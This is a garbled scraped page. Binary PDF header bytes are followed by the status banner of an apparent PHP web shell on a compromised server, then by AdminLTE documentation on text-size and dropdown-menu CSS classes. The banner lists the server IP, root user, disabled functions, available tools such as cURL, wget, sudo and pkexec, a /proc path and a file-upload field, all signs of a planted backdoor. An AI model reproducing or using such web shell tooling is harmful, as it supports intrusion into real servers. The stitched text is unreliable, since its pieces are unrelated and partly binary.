%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 49.231.201.246 / Your IP : 216.73.216.149 Web Server : Apache/2.4.18 (Ubuntu) System : Linux 246 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64 User : root ( 0) PHP Version : 7.0.33-0ubuntu0.16.04.16 Disable Function : exec,passthru,shell_exec,system,proc_open,popen,pcntl_exec MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /proc/11585/cwd/html/water/backend/web/assets/d9e10a69/docs/components/ |
Upload File : |
--- layout: page title: Miscellaneous --- AdminLTE has smaller custom classes that not related to other components are listed here. ### Text Size You can change the font sizes with adding to any element `.text-*` e.g. (`.text-sm`). - `.text-xs` (0.75rem) - `.text-sm` (0.875rem) - `.text-md` (1rem) - `.text-lg` (1.25rem) - `.text-xl` (2rem) > ##### Tip! > You can also add `.text-sm` to `body`, with this you get a complete smaller font on the UI or can you add `.text-sm` to `.main-sidebar` or `.main-header` & `.brand-link`. {: .quote-info} ### Dropdown Menu Large You can add the `.dropdown-menu-lg` to `.dropdown-menu` for a bigger dropdown menu. ### Dropdown Hover You can add the `.dropdown-hover` class beside this classes: - `.dropdown` (to use hover for the whole dropdown menu) - `.dropdown-menu` (to use hover on a specific menu item & sub menus) - `.dropdown-submenu` (to use hover on a specific sub menu item & sub sub menus)